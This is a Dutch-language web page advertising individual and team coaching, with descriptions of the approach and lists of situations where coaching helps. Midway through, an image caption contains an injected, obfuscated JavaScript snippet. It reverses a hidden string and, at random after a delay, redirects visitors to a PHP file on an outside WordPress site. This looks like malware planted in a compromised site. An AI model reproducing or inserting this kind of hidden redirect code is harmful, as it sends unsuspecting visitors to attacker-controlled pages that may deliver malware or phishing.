Wat is coaching?

Coaching is een creatief reflectieproces waardoor iemands persoonlijk en professioneel potentieel aangewakkerd wordt en men er in slaagt de gestelde doelstellingen te realiseren. Hierbij blijft de coachee zelf verantwoordelijk voor zijn of haar beslissingen.

Hoe bewuster we zijn van wat ons echt drijft, hoe gemakkelijker zelfs de moeilijkste uitdaging wordt.

personla-coaching-image

Wanneer kies je voor coaching?

Als je wenst te bouwen op jouw aanwezig talent (of dat van je medewerkers) en  nieuwe mogelijkheden wil ontdekken om jouw gewenste doelstellingen te bereiken. Coaches hebben als uitgangspunten dat  de klant de expert in zijn of haar leven en werk is en dat elke klant creatief en vindingrijk is om oplossingen te bedenken om zijn eigen doelstellingen te realiseren.

Enkele belangrijke sleutels voor een succesvol  individueel coachingstraject zijn : co-creatief samenwerkingsverband, gelijkwaardigheid, verantwoordelijkheid , challenge en zelfsturing.

Als je wilt leiden, moet je volgen. Lao Tzu

Individuele coaching

Voorafgaand aan elke sessie kiest de coachee het aan te kaarten thema. De coach luistert, stelt vragen en geeft nadien opmerkingen. Op deze wijze verduidelijken we de perceptie van de coachee en oriënteren we deze in de richting van een actieve houding.

De coachee wordt op zijn verantwoordelijkheid in het nastreven van zijn eigen objectieven gewezen, terwijl de coach deze omkadert met als doel de coachee toe te laten om zijn kennis verder uit te diepen, zijn prestaties te verbeteren en zijn professioneel leven te valoriseren. Dankzij de coaching kan de coachee rekenen op een versnelde vooruitgang binnen het door hem gekozen kader om zijn objectieven te behalen.

Team coaching

Tijdens het team coaching traject ligt de focus op de optimalisatie van de teamwerking. Teamleden ontdekken hoe ze onbewust en ongewild de huidige realiteit in stand houden en wat er nodig is om de gewenste shift te creëren.

Tijdens het teamcoachingstraject ontstaat openheid en vertrouwen, het onbespreekbare wordt bespreekbaar. Gedaan met de meetings achter de meetings want iedereen zegt wat hij denkt en voelt op het moment dat het er écht toe doet. Teamleden scharen zich achter genomen beslissingen en spreken elkaar aan op het het genomen engagement.

Gezien ieder team in een uniek is, wordt elk traject maatwerk. Op basis van intakegesprekken krijgen we een helder beeld van de huidige realiteit en de gewenste doelen. Hierop gebaseerd, stellen we een aanpak voor.

personal-coaching-image-02
Mijn_<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>dochters_komen_niet_overeen

Situaties waar Coaching u kan helpen

Coaching kan worden gebruikt voor veel redenen, de ene even geldig als de andere, afhankelijk van de specifieke behoeften van de persoon.

 

  • Voorbereiding op het nemen van een nieuwe rol in een organisatie
  • Vergemakkelijken van de integratie in een nieuwe organisatie of in een nieuwe rol
  • Meer effectief leiderschap willen ontwikkelen
  • Een belangrijke kwestie behandelen (uitdaging, ambitieuze doelstelling, verkoopkans, enz...)
  • Willen ontwikkelen van specifieke vaardigheden: communicatie, presentatie, delegatie, teammanagement, prestaties, enz...
  • Een leemte aanpakken in termen van vaardigheden, vertrouwen in zelf of creatieve middelen
  • Zijn carrière in een nieuwe wending geven of nadenken over zijn huidige carrière

Enkele voorbeelden van TeamCoaching :

Teameffectiviteit en maturiteit 
Ontdekken van persoonlijkheden
Conflicthanteringsstijlen
Communicatiestijlen
Schaduwkant van leiderschap

bharath-reddy-3UDKNMKfFss-unsplash